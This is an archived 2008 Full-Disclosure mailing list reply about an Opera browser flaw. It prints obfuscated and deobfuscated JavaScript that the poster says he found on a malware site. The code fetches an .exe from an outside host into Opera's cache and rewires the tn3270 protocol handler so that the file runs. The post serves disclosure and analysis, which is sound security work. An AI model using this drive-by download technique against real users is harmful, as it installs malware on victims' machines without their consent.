lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST)
From: Kanedaaa Bohater <kaneda@...ater.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera Stored Cross Site Scripting


> Just found a way to use Stefano's opera:config idea to execute code from
> remote.

Hi.

3 months ago I found on some malware site
(www.google.com.update.login.jsp.podavanda.cn), that when Your UserAgent 
was Opera - they send to You code similar to Yours, but they first 
download malware .exe file to opera:cache (Opera use pre_downloading 
files) and later change tn3270:// protocol to this file (but without 
opera:historysearch). It was probably for older Opera version...


<script>
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@...Bi@f@...Bm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, ''));
document.appendChild(blank_iframe);
blank_iframe_window.eval
 	("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
 	config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), "cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
 	config_iframe.src = 'opera:config';\
 	document.appendChild(config_iframe);\
 	app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\
 	cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
 	app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@...yo@...ye@...yoXmY.Xu@...YaytYeU.UlYoygXiyny.Uj@s@pX.@...Xd@...YaynydXaY.yc@...XI@I@...yxXlXoUaydUe@r@.ye@...X".replace(/[UXYy@]/g, '');\
 	app_iframe.onload = function ()\
 	{\
 		cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\
 		cache_iframe.onload = function ()\
 		{\
 			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
 			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
 			filename = cache.match(re);\
 			config_iframe_window.eval\
 			(\"\
 			opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
 			app_link = document.createElement('a');\
 			app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
 			app_link.click();\
 			setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, ''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
 			\");\
 		};\
 		document.appendChild(cache_iframe);\
 	};\
 	document.appendChild(app_iframe);");
</script>


which was something like:

<script>
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
blank_iframe_window.eval
 	("config_iframe = document.createElement("iframe");\
 	config_iframe.setAttribute("id", "config_iframe_window");\
 	config_iframe.src = 'opera:config';\
 	document.appendChild(config_iframe);\
 	app_iframe = document.createElement("script");\
 	cache_iframe = document.createElement("iframe");\
 	app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
 	app_iframe.onload = function ()\
 	{\
 		cache_iframe.src = "opera:cache";\
 		cache_iframe.onload = function ()\
 		{\
 			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
 			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
 			filename = cache.match(re);\
 			config_iframe_window.eval\
 			(\"\
 			opera.setPreference("Network","TN3270 App",opera.getPreference("User Prefs","Cache Directory4")+parent.filename[1]);\
 			app_link = document.createElement('a');\
 			app_link.setAttribute("href", "tn3270://nothing");\
 			app_link.click();\
 			setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\
 			\");\
 		};\
 		document.appendChild(cache_iframe);\
 	};\
 	document.appendChild(app_iframe);");
</script>

but unfortunately I dont have to much time for test...

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda@...ater.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists